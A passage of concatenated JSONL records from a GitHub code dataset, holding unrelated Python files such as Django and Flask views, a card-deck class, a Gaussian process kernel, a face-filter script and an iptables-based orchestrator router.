#######################################################\nMENU_BACKGROUND_COLOR = '#262624'\nMENU_ACCENT_COLOR = '#ffff00'\n\n###################################################### utils #######################################################\nPREVIEW_DIFFICULTY_IMAGE_RESIZE_FACTOR = 
520\n","repo_name":"Lexris/PacmanLabyrinth_python","sub_path":"src/menu/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39079571378","text":"import json\n\ndef serializer(l):\n ret = []\n for row in l:\n ret.append(json.loads(row.serialize()))\n return json.dumps(ret)\n\ndef dictionalizer(l):\n ret = []\n for row in l:\n ret.append(json.loads(row.serialize()))\n return ret\n\n\ndef is_person(daily):\n from gluoncv import data, utils\n import pickle\n import os\n\n try:\n # https://github.com/dmlc/gluon-cv, pretrained faster_rcnn_resnet50_v1b_voc\n with open('../static/faster_rcnn_resnet50_v1b_voc.pkl', 'rb') as fp:\n net = pickle.load(fp)\n except Exception:\n import urllib.request\n urllib.request.urlretrieve('https://project-lookmorning.s3.ap-northeast-2.amazonaws.com/faster_rcnn_resnet50_v1b_voc.pkl','faster_rcnn_resnet50_v1b_voc.pkl')\n with open('../static/faster_rcnn_resnet50_v1b_voc.pkl', 'rb') as fp:\n net = pickle.load(fp)\n\n im_fname = utils.download(daily['img_path'])\n x, orig_img = data.transforms.presets.rcnn.load_test(im_fname)\n box_ids, scores, bboxes = net(x)\n\n labels = box_ids[0].asnumpy()\n scores = scores[0].asnumpy()\n for i, bbox in enumerate(bboxes[0]):\n if labels is not None and labels.flat[i] != 14: # box_id 14 is 'person'\n continue\n if scores is not None and scores.flat[i] < 0.7: # Let thresh = 0.7\n continue\n return True\n\n # delete downloaded file\n os.remove(im_fname)\n\n return False","repo_name":"sisobus/WebStudio2019","sub_path":"projects/20130602/api/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"29302010626","text":"S = input()\n\"\"\"\n方針\n1. 確実にif char in s: で確実に文字が含まれているリストを作成\n2. リストO、リストXを作っておく\n3. for ループでi, char でenumarate(S)を回す\n4. もしcharが==\"o\"ならOにappend str(i)\n5. もしcharが==\"x\"ならXにappend str(i)\n\n1.asn = 0としておく\n2. 文字列sの中に含まれていない数字のリストを作成\n3. 10000回ループで文字列.zfill(4)で4桁目まで穴埋め\n4. もしjudge関数(s)でTrue判定が出たなら\n5. ans に+1\n\njudge関数について\n1. リストOのループを回す\n2. s内にOの要素がなければ Falseを返す\n3. Xも同様でs 内にxの要素があればFalseを返す\n\n\"\"\"\n\nT = []\nF = []\n\ndef judge(s):\n for t in T:\n if t not in s:\n return False\n\n for f in F:\n if f in s:\n return False\n return True\n\n\nfor i, char in enumerate(S):\n if char == \"o\":\n T.append(str(i))\n elif char == \"x\":\n F.append(str(i))\n\nans = 0\n\nfor i in range(10000):\n s = str(i).zfill(4)\n if judge(s):\n ans += 1\n\nprint(ans)\n\n\n\n\n\n","repo_name":"motokikando/code_algorithm","sub_path":"ABC/ABC201/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22047438400","text":"from . 
import card\nimport random\n\nclass Deck:\n\n\n def __init__( self ):\n suits = [ \"spades\" , \"hearts\" , \"clubs\" , \"diamonds\" ]\n self.cards = []\n\n for s in suits:\n for i in range(1,14):\n str_val = \"\"\n point_val = i\n if i == 1:\n str_val = \"Ace\"\n point_val = 13\n elif i == 11:\n str_val = \"Jack\"\n elif i == 12:\n str_val = \"Queen\"\n elif i == 13:\n str_val = \"King\"\n else:\n str_val = str(i)\n self.cards.append( card.Card( s , point_val , str_val ) )\n\n def show_cards(self):\n for card in self.cards:\n card.card_info()\n \n def empty_deck(self):\n self.cards.clear()\n\n def randomize(self):\n new_deck = Deck()\n new_deck.empty_deck()\n while len(self.cards):\n random_number = random.randrange(0,len(self.cards))\n new_deck.cards.append(self.cards[random_number])\n self.cards.pop(random_number)\n self.cards = new_deck.cards\n\n def split_deck(self):\n new_deck = Deck()\n new_deck.empty_deck()\n while len(self.cards) > 26:\n random_number = random.randrange(0,len(self.cards))\n new_deck.cards.append(self.cards[random_number])\n self.cards.pop(random_number)\n return new_deck.cards\n","repo_name":"ChrisSav713/Deck_of_Cards","sub_path":"classes/deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38000176741","text":"import pika\nimport json\nimport fire\nfrom loguru import logger\nfrom stock_predict.stock_spider.config import config\n\n\nparameters = (\n pika.ConnectionParameters(host=config[\"RABBITMQ_HOST\"], port=config[\"RABBITMQ_PORT\"],heartbeat=0)\n)\n\nconn = pika.BlockingConnection(parameters)\nchannel = conn.channel()\n\ndef publish_get_hs300_daily():\n payload = {\n 'task':'hs300_daily'\n }\n logger.info(\"publish to queue {} get_hs300_daily\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\"))\n\ndef publish_get_hs300_all():\n payload = {\n 'task':'hs300_all'\n }\n logger.info(\"publish to queue {} get_hs300_all\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\"))\n\ndef publish_daily_update_etf():\n payload = {\n 'policy_stock_pool':config[\"policy_stock_pool\"],\n 'task':'daily_update_etf'\n }\n logger.info(\"publish to queue {} daily_update_etf\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\")) \n\ndef publish_write_stock(code):\n payload = {\n 'code':code,\n 'task':'write_stock'\n }\n logger.info(\"publish to queue {} write_stock\".format(config['routing_key']))\n channel.basic_publish(exchange='', routing_key=config['routing_key'], body=bytes(json.dumps(payload), \"utf-8\")) \n\n\nif __name__ == \"__main__\":\n fire.Fire()\n","repo_name":"Ricardo-wangxing/stock-predict","sub_path":"publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"5178335283","text":"import bs4\n\nfrom typing import List\nimport asyncio\n\n\ndef foo(a: List[str]) -> int:\n return a\n\n\ns = foo([\"12\"])\ns.decode('12')\n\n\nasync def factorial():\n global taskid\n while 1:\n task = await father_child.get()\n # child_father.put(task)\n await asyncio.sleep(2)\n await child_father.put(task)\n\n\ndef genFure():\n future = 
asyncio.Future()\n future.set_result(100)\n # print(loop.create_task(asyncio.sleep(4)))\n # future.set_result(100)\n return future\n\n\ndef callback(*args):\n print(\"callback {}\".format(str(args)))\n\n\nasync def wrapfuture():\n await asyncio.sleep(2)\n asyncio.ensure_future(main(), loop=loop)\n\n\nasync def main():\n for _ in range(10):\n print(\"father put task {} {}\".format(_, type(_)))\n await father_child.put(_)\n tasks = [\n asyncio.ensure_future(factorial()),\n asyncio.ensure_future(factorial()),\n asyncio.ensure_future(factorial())]\n while 1:\n task = await child_father.get()\n print(\"father know {} finished\".format(task))\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n father_child = asyncio.Queue()\n child_father = asyncio.Queue()\n loop.run_until_complete(main())\n loop.run_forever()\n","repo_name":"connectthefuture/PythonCode","sub_path":"python3/tools/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38681669344","text":"import sys\r\nsys.path.append(\"../Utilities\")\r\n\r\nimport pandas as pd\r\nfrom scipy import stats\r\nimport csv\r\n\r\nPATH_FILE_RESULTS_JACCARD_LEVEL = \"../../Risultati/Jaccard_Level/Jaccard_Level_Results.csv\"\r\nPATH_FILE_METRICS = \"../../dataset/Dataset formato CSV/metrics.csv\"\r\nPATH_FILE_RESULTS = \"../../Risultati/Linear_Fit/Linear_Fit_Results.csv\"\r\n\r\nFIELD_LINEAR_FIT = ['original_tweet_id', 'lvl_usr_diff_slope', 'lvl_usr_diff_gof', 'lvl_usr_diff_intercept']\r\n\r\n#Apriamo i risultati ottenuti precedentemente sulle cascate, divisi per livelli\r\npd_results = pd.read_csv(PATH_FILE_RESULTS_JACCARD_LEVEL)\r\n\r\nwith open(PATH_FILE_METRICS, encoding = \"utf8\") as file_metrics, open(PATH_FILE_RESULTS, 'w', newline = '') as file_results:\r\n reader_metrics = csv.DictReader(file_metrics)\r\n writer_results = csv.DictWriter(file_results, fieldnames = FIELD_LINEAR_FIT)\r\n writer_results.writeheader()\r\n \r\n row_counter = 0\r\n \r\n for row in reader_metrics:\r\n \r\n #Recuperiamo la lista delle medie, ordinate a partire dal livello più basso\r\n mean_list = list(pd_results.loc[(pd_results[\"original_tweet_id\"] == int(row[\"original_tweet_id\"])) & (pd_results['num_level'] != 1000)].sort_values(\"num_level\", ascending = True)[\"lvl_usr_diff_mean\"])\r\n \r\n #Non consideriamo le cascate troppo piccole o problematiche\r\n if not mean_list or len(mean_list) < 2:\r\n continue\r\n \r\n #Generiamo un array di numeri consecutivi da 1 al numero dei livelli\r\n x_axis = list(map(lambda x: x + 1, list(range(len(mean_list)))))\r\n \r\n #Effettuiamo il fit lineare\r\n slope, intercept, rvalue, pvalue, stderr = stats.linregress(x_axis, mean_list) \r\n \r\n #Scriviamo i risultati\r\n writer_results.writerow({'original_tweet_id': row['original_tweet_id'], 'lvl_usr_diff_slope': slope, 'lvl_usr_diff_gof': rvalue, 'lvl_usr_diff_intercept': intercept}) \r\n \r\n row_counter += 1","repo_name":"steflyx/A-Study-on-polarization-on-Twitter","sub_path":"Tesi/Script Python/Script di calcolo/LinearFitCalculator.py","file_name":"LinearFitCalculator.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39284961089","text":"from django.urls import path\nfrom . 
import views\n\napp_name = \"tasklists\"\n\nurlpatterns = [\n # ADD TASK AND RETRIEVE TASK\n path('', views.todo_index, name=\"toDo\"),\n path('delete//', views.delete, name=\"task_delete\"),\n path('status/change//', views.changestatus, name=\"change_status\"),\n path('edit//', views.edittask, name=\"edit_task\"),\n]\n","repo_name":"abdulrahim-uj/postgres_work","sub_path":"tasklists/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6726532637","text":"elements = input().split()\nstock = {}\nsearched_products = input().split()\nfor index in range(0, len(elements), 2):\n key = elements[index]\n value = elements[index + 1]\n stock[key] = int(value)\n\nfor product in searched_products:\n if product in stock:\n print(f\"We have {stock[product]} of {product} left\")\n else:\n print(f\"Sorry, we don't have {product}\")\n\n","repo_name":"miglenamag/pythonFundamentals","sub_path":"07.dictionaries/dict-lab/2.stock.py","file_name":"2.stock.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71180986487","text":"import json\r\nfilename = 'username.json'\r\nname = ''\r\n\r\ntry:\r\n with open(filename, 'r') as rrr:\r\n name = json.load(rrr)\r\nexcept IOError:\r\n print('first time login')\r\n\r\nif name != '': \r\n print(\"Welcome back, \" + name + \"!\")\r\nelse: \r\n name = input('Hello, what is your name?')\r\n\r\ntry:\r\n with open(filename, 'w') as f:\r\n name = json.dump(name, f)\r\nexcept IOError:\r\n print('Try again')\r\n","repo_name":"Desmazing/aws_restart","sub_path":"hellojson.py","file_name":"hellojson.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25031415051","text":"from itools.core import merge_dicts\nfrom itools.datatypes import Boolean, Integer, Unicode\nfrom itools.datatypes import String\nfrom itools.gettext import MSG\nfrom itools.web import STLView, STLForm\nfrom itools.xml import XMLParser\n\n# Import from ikaaro\nfrom ikaaro.forms import MultilineWidget\nfrom ikaaro.messages import MSG_CHANGES_SAVED\n\n# Import from shop\nfrom shop.payments.payment_way_views import PaymentWay_Configure\nfrom shop.payments.payment_way_views import PaymentWay_EndView\nfrom shop.utils import format_price\n\n\n\nclass CashPayment_RecordView(STLView):\n\n template = '/ui/backoffice/payments/cash/record_view.xml'\n\n def get_namespace(self, resource, context):\n get_record_value = self.payment_table.get_record_value\n amount = get_record_value(self.record, 'amount')\n return {'is_ok': get_record_value(self.record, 'state'),\n 'amount': format_price(amount),\n 'ref': get_record_value(self.record, 'ref'),\n 'address': self.payment_way.get_property('address')}\n\n\nclass CashPayment_RecordEdit(STLForm):\n\n template = '/ui/backoffice/payments/cash/record_edit.xml'\n\n schema = {'payment_way': String,\n 'id_payment': Integer,\n 'state': Boolean}\n\n\n def get_value(self, resource, context, name, datatype):\n if name == 'payment_way':\n return self.payment_way.name\n elif name == 'id_payment':\n return self.id_payment\n get_record_value = self.payment_table.get_record_value\n return get_record_value(self.record, name)\n\n\n def action_edit_payment(self, resource, context, form):\n kw = {'state': form['state']}\n if kw['state']:\n 
self.payment_way.set_payment_as_ok(self.id_payment, context)\n self.payment_table.update_record(self.id_payment, **kw)\n context.message = MSG_CHANGES_SAVED\n\n\n\nclass CashPayment_Configure(PaymentWay_Configure):\n\n title = MSG(u'Configure checkpayment module')\n\n schema = merge_dicts(PaymentWay_Configure.schema,\n address=Unicode(mandatory=True))\n\n\n widgets = PaymentWay_Configure.widgets + [\n MultilineWidget('address', title=MSG(u'Address'))]\n\n\n\nclass CashPayment_End(PaymentWay_EndView):\n\n access = \"is_authenticated\"\n\n template = '/ui/backoffice/payments/cash/end.xml'\n\n def get_namespace(self, resource, context):\n address = resource.get_property('address').encode('utf-8')\n return merge_dicts(\n PaymentWay_EndView.get_namespace(self, resource, context),\n address=XMLParser(address.replace('\\n', '
    ')))\n","repo_name":"hforge/shop","sub_path":"payments/cash/cash_views.py","file_name":"cash_views.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"37943379943","text":"from flask import Flask,render_template,request,url_for\r\nimport jsonify\r\nimport requests\r\nimport pickle\r\nimport numpy as np\r\nimport sklearn\r\n\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('file.pkl','rb'))\r\n\r\n@app.route('/',methods=['GET'])\r\ndef Home(): \r\n return render_template('index.html') \r\n\r\nstandard_to = StandardScaler()\r\n\r\n@app.route('/predict',methods = ['POST'])\r\ndef predict():\r\n Fuel_Type_Diesel =0\r\n if request.method == 'POST':\r\n year = int(request.form['year'])\r\n new_price = float(request.form['new_price'])\r\n kmdriven = int(request.form['kmdriven'])\r\n fueltype = request.form['fuel']\r\n transmissiontype = request.form['transmissiontype']\r\n enginecc=int(request.form['enginecc'])\r\n mileage=float(request.form['mileage'])\r\n if(fueltype == 'Petrol'):\r\n fuel = 0\r\n if(fueltype == 'Diesel'):\r\n fuel = 1\r\n else:\r\n fuel = 2\r\n\r\n if(transmissiontype == 'Manual'):\r\n transmissiontype = 0\r\n else:\r\n transmissiontype = 1\r\n\r\n prediction = model.predict([[new_price,year,fuel,transmissiontype,mileage,enginecc,kmdriven]])\r\n output = round(prediction[0],2)\r\n \r\n if output<0:\r\n return render_template('index.html',prediction_text='Sorry! You cannot sell this car')\r\n else:\r\n return render_template('index.html', prediction_text='You can sell this car at Rs.{} lakhs'.format(output))\r\n \r\n else:\r\n return render_template('index.html')\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"jayantsinghjhala/Projects","sub_path":"Used Car Price Evaluator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27395825518","text":"from django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.shortcuts import redirect,render\n# template\nfrom django.template import Template,Context,loader\n# auth\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, logout, authenticate\n# gestor\nfrom gestor.models import *\nfrom gestor.forms import UserRegisterForm\n# python \nimport datetime\nimport pdb # pdb.set_trace()\n\n# django User model and auth class\n\ndef usuarioAdd(req):\n diccionario = {\n 'fecha':datetime.datetime.now(),\n 'model':'usuarios',\n # 'theme':'Quartz',\n # 'theme':'Sketchy',\n } \n if req.method == 'POST':\n form=UserRegisterForm(req.POST)\n if form.is_valid(): \n username=form.cleaned_data['username']\n form.save()\n messages.success(req,f'El usuario {username} fue creado con exito ')\n else:\n messages.success(req,f'Probando los mensajes')\n form=UserRegisterForm()\n # diccionario['usuarios']= User.objects.all()\n diccionario['formulario']= form\n return render(req,'Usuario.html',diccionario)\n\ndef usuarioLogin(req): \n diccionario = {\n 'fecha':datetime.datetime.now(),\n # 'model':'usuarios',\n # 'theme':'Quartz',\n # 'theme':'Sketchy',\n }\n if req.method == 'POST':\n form=AuthenticationForm(req,req.POST)\n if form.is_valid():\n username=form.cleaned_data['username']\n password=form.cleaned_data['password']\n 
user = authenticate(username=username,password=password)\n if user is not None:\n login(req,user)\n messages.success(req,f'Hola {username} bienvenido')\n return redirect('home')\n else:\n messages.error(req, f'Usuario o contraseña incorrectas')\n else:\n messages.error(req, f'Usuario o contraseña incorrectas')\n else:\n form=AuthenticationForm()\n # diccionario['usuarios']= User.objects.all()\n diccionario['formulario']= form\n return render(req,'Login.html',diccionario)\n\ndef usuarioLogout(req):\n logout(req)\n return redirect('login')\n\n# Learn django\n\ndef calculo(req,fechaNacimiento,fechaFutura): \n añoActual = datetime.datetime.now().year\n edadActual = añoActual-fechaNacimiento\n edadFutura = fechaFutura-fechaNacimiento\n diccionario={\n 'fechaNacimiento':fechaNacimiento,\n 'edadActual':edadActual,\n 'edadFutura':edadFutura,\n 'fechaFutura':fechaFutura,\n\n }\n doc_externor=loader.get_template('calculo.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef saludar(req):\n diccionario = {\"titulo\":'Pagina de bienvenida',}\n doc_externor=loader.get_template('layout/layout.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef tareas(req):\n taskList = ['Migrar templates desde Flask','reciclar Header y fotter en templates']\n diccionario={\n 'titulo':'Lista de tareas',\n 'nameList':'Tareas Django',\n 'taskList':taskList\n }\n doc_externor=loader.get_template('tareas.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef fecha(req):\n fecha = datetime.datetime.now()\n diccionario = {\n 'titulo':'Pagina de fecha',\n 'fecha':fecha\n }\n doc_externor=loader.get_template('intro.html')\n documento=doc_externor.render(diccionario)\n return HttpResponse(documento)\n\ndef videos(req):\n fecha = datetime.datetime.now()\n diccionario = {\n 'titulo':'Pagina de videos',\n 'fecha':fecha\n }\n doc_externor=loader.get_template('videos.html')\n documento=doc_externor.render(diccionario) \n return HttpResponse(documento)\n\n\n # art = articulo.objects.filter(seccion='tecnologia')\n # art = articulo.objects.filter(precio__gt=90) ","repo_name":"Juanklg/G29-MinTic","sub_path":"proydjango/proydjango/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70279882805","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nfrom collections import deque\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n if root is None:\n return 0\n depth = 0\n q = deque()\n q.append(root)\n while len(q) != 0:\n depth += 1\n size = len(q)\n for _ in range(size):\n node = q.popleft()\n if node.left is None and node.right is None:\n return depth\n if node.left is not None:\n q.append(node.left)\n if node.right is not None:\n q.append(node.right)\n return depth\n","repo_name":"erenming/leetcode-py3","sub_path":"bfs/minDepth.py","file_name":"minDepth.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33458687329","text":"from .db import db\nfrom datetime import datetime\n\n\nclass Repair(db.Model):\n __tablename__ = 'repairs'\n\n id = db.Column(db.Integer, primary_key=True)\n pool_id = db.Column(\n db.Integer, db.ForeignKey(\"pools.id\"), nullable=False)\n title = 
db.Column(db.String(100), nullable=False)\n description = db.Column(db.Text)\n created_at = db.Column(db.DateTime, nullable=False, default=datetime.now())\n updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now())\n\n pool = db.relationship(\n \"Pool\", back_populates=\"repairs\")\n tasks = db.relationship(\n \"Task\", back_populates=\"repair\", order_by=\"Task.updated_at.desc()\", cascade=\"delete, delete-orphan\")\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"pool_id\": self.pool_id,\n \"title\": self.title,\n \"description\": self.description,\n \"created_at\": self.created_at,\n \"updated_at\": self.updated_at,\n }\n\n def to_dict_tasks(self):\n return {\n \"id\": self.id,\n \"pool_id\": self.pool_id,\n \"tasks\": [task.to_dict() for task in self.tasks],\n \"title\": self.title,\n \"description\": self.description,\n \"created_at\": self.created_at,\n \"updated_at\": self.updated_at,\n }\n\n def to_dict_full(self):\n return {\n \"id\": self.id,\n \"pool_id\": self.pool_id,\n \"tasks\": [task.to_dict() for task in self.tasks],\n \"pool\": self.pool.to_dict_client(),\n \"title\": self.title,\n \"description\": self.description,\n \"created_at\": self.created_at,\n \"updated_at\": self.updated_at,\n }\n","repo_name":"memg92/poolsight","sub_path":"app/models/repair.py","file_name":"repair.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"14945660718","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\nimport numpy as np\nimport cv2\nfrom mtcnn import MTCNN\nimport matplotlib.pyplot as plt\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# %%\n#Import image here\n\nimage = cv2.imread(\"human.jpg\")\nimage = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\nplt.imshow(image)\n\n\n# %%\n# Add object to show in filter ,ex:sunglasses\nglasses = cv2.imread(\"sunglasses_blue.png\",-1)\nglasses = cv2.cvtColor(glasses,cv2.COLOR_BGR2RGBA)\nplt.imshow(glasses)\n\n\n# %%\nmtcnn = MTCNN()\nfaces = mtcnn.detect_faces(image)\nfaces\n\n\n# %%\n#Use in case of multiple faces\nface = faces[0]\nface\n\n\n# %%\nx, y, w, h =face['box']\n\ntemp_image = np.copy(image)\n\ntemp_image = cv2.rectangle(temp_image,(x,y),(x+w,y+h),(0,0,255),2)\n\nplt.imshow(temp_image)\n\n\n# %%\nimg_filter = np.copy(glasses)\nbg_image = np.copy(image)\n\n\n(x1,y1),(x2,y2) = (face['keypoints']['left_eye']),(face['keypoints']['right_eye'])\n\nx1 -= 35\ny1 -= 30\nx2 += 35\ny2 += 30\n\nw = x2 - x1\nh = y2 - y1\n\nimg_filter = cv2.resize(img_filter,(w,h))\n\nalpha_filter = img_filter[:,:,3]/255.0\nalpha_bg = 1.0 -alpha_filter\n\nfor c in range(0,3):\n bg_image[y1:y2,x1:x2,c] = (alpha_filter * img_filter[:,:,c]+ \n alpha_bg * bg_image[y1:y2,x1:x2,c])\n \nplt.imsave(\"final_image.jpg\",bg_image)\nplt.imshow(bg_image)\n\n\n# %%\nsnapchat_filter = np.hstack((image,bg_image))\n\nplt.imsave(\"snapchat_filter.jpg\",snapchat_filter)\nplt.imshow(snapchat_filter)\n\n\n# %%\ncv2.destroyAllWindows()\n\n\n# %%\n\n\n\n","repo_name":"Abh300/Snapchat_filter","sub_path":"Python_code.py","file_name":"Python_code.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11158813291","text":"\"\"\"\nContains code for the base kernel object used when making kernels for\ngaussian process modeling.\n\"\"\"\n\nimport numpy as np\nfrom 
squidward.utils import array_equal, exactly_2d\n\nnp.seterr(over=\"raise\")\n\nclass Kernel(object):\n \"\"\"Base class for Kernel object.\"\"\"\n\n def __init__(self, distance_function=None, method='k1'):\n \"\"\"\n Description\n ----------\n This class is the base class for a kernel object. It basically takes the\n input distance function and finds the the distance between all vectors in\n two lists and returns that matrix as a covariance matrix.\n\n Parameters\n ----------\n distance_function : Function\n A function that takes in two vectors and returns a float\n representing the distance between them.\n method: String\n The method used for iterating over the input vectors to arrive\n at the covariance matrix.\n\n Returns\n ----------\n Model object\n \"\"\"\n self.distance_function = distance_function\n\n assert self.distance_function is not None, \\\n \"Model object must be instantiated with a valid distance function.\"\n\n assert not isinstance(self.distance_function, (str, int, float, list, np.ndarray)), \\\n \"Model object must be instantiated with a valid distance function.\"\n\n if method == 'k1':\n self._k = self._k1\n elif method == 'k2':\n self._k = self._k2\n else:\n raise Exception(\"Invalid argument for kernel method.\")\n\n def __call__(self, alpha, beta):\n \"\"\"\n Parameters\n ----------\n alpha: array-like\n The first array to compare. Must either be a 1 or 2D array.\n beta: array-like\n The second array to compare. Must match dimensions for alpha.\n \"\"\"\n alpha, beta = exactly_2d(alpha), exactly_2d(beta)\n return self._k(alpha, beta)\n\n def _k1(self, alpha, beta):\n \"\"\"\n Implementation inspired by scipy.spacial.distance cdist v1.2.0\n For loop through every index i,j for input vectors alpha_i and beta_j\n \"\"\"\n # lengths of each vector to compare\n n_len, m_len = alpha.shape[0], beta.shape[0]\n # create an empty array to fill with element wise vector distances\n cov = np.full((n_len, m_len), 0.0)\n # loop through each vector\n for i in range(n_len):\n for j in range(m_len):\n # assign distances to each element in covariance matrix\n cov[i, j] = self.distance_function(alpha[i, :], beta[j, :])\n return cov\n\n def _k2(self, alpha, beta):\n \"\"\"\n Implementation that exploits covariance symmetry when possible. 
Good\n for fitting and testing on larger datasets.\n \"\"\"\n # lengths of each vector to compare\n n_len, m_len = alpha.shape[0], beta.shape[0]\n # if comparing an array against itself exploit symmetry\n if array_equal(alpha, beta):\n # create an empty array to fill with element wise vector distances\n cov = np.full((n_len, m_len), 0.0)\n # loop through each vector\n for i in range(n_len):\n for j in range(i, m_len):\n # assign distances to each element in covariance matrix\n cov[i, j] = cov[j, i] = self.distance_function(alpha[i, :], beta[j, :])\n return cov\n return self._k1(alpha, beta)\n","repo_name":"James-Montgomery/squidward","sub_path":"squidward/kernels/kernel_base.py","file_name":"kernel_base.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25353529032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 26 12:00:29 2021\n\n@author: jkuhnsman\n\"\"\"\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom io import BytesIO\nimport json\nimport ast\nfrom threading import Thread\nimport time\nimport requests\nimport imp\nimport os\nimport iptc\n\nimport Orchestrator\n\nimp.reload(Orchestrator)\n\nglobal body\nglobal KEEP_RUNNING\nKEEP_RUNNING = True\n\nclass Router():\n def __init__(self, _orchPool):\n self.orchPool = _orchPool\n self.current_orch = None\n \n def orchPoolHasPhysicalOrchs(self):\n if len(self.orchPool.physicalOrchestrators) > 0:\n return True\n else:\n return False\n \n def set_current_orch(self, orch):\n if self.current_orch == orch:\n print('already using the best orchestrator')\n else:\n self.current_orch = orch\n self.iptable_flush()\n self.iptable_add(orch)\n \n def iptable_flush(self):\n iptc.Table('nat').chains[0].flush()\n \n def iptable_add(self,orch):\n add_orch = 'iptables -t nat -A PREROUTING -i enp1s0 -p tcp --dport 8935 -j DNAT --to {}'\n os.system(add_orch.format(orch.ipAddr))\n \n \n \nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n global orchPool \n global server\n \n def do_GET(self):\n self.send_response(200)\n self.end_headers()\n self.wfile.write(b'Hello, world!')\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n data = self.rfile.read(content_length)\n data_decoded = data.decode('utf-8')\n body = ast.literal_eval(data_decoded)\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(b'This is POST request. 
')\n response.write(b'Received: ')\n response.write(data)\n self.wfile.write(response.getvalue())\n #print(repr(body))\n orchPool.process_request(body)\n \ndef http_server():\n #global server\n global KEEP_RUNNING\n \n httpd = HTTPServer(('', 6000), SimpleHTTPRequestHandler)\n while True:\n httpd.handle_request()\n \n time.sleep(1)\n print('http server is done')\n \ndef main():\n global router\n print('clear iptables')\n while True:\n availableOrchs = router.orchPool.get_available_orchs()\n \n if len(availableOrchs) > 0:\n router.set_current_orch(availableOrchs[0])\n else:\n print('no orchestrators available')\n \n time.sleep(3)\n#%%\nglobal orchPool\norchPool = Orchestrator.OrchestratorPool()\n\nglobal router\nrouter = Router(orchPool)\n#%%\n\njs1 = {'command':'register_orchestrator',\n 'type':'physical',\n 'ipAddr':'1.2.3.4',\n 'maxSessions':10,\n 'isDefault':'yes'}\n\njs2 = {'command':'register_orchestrator',\n 'type':'virtual',\n 'ipAddr':'2.6.7.8',\n 'maxSessions':10,\n 't_id':'i-014c83a7f386f9e6b'}\n\njs3 = {'command':'register_orchestrator',\n 'type':'physical',\n 'ipAddr':'3.2.3.4',\n 'maxSessions':10,\n 'isDefault':'no'}\n\nmet = {'command':'update_metrics',\n 'ipAddr':'1.2.3.4',\n 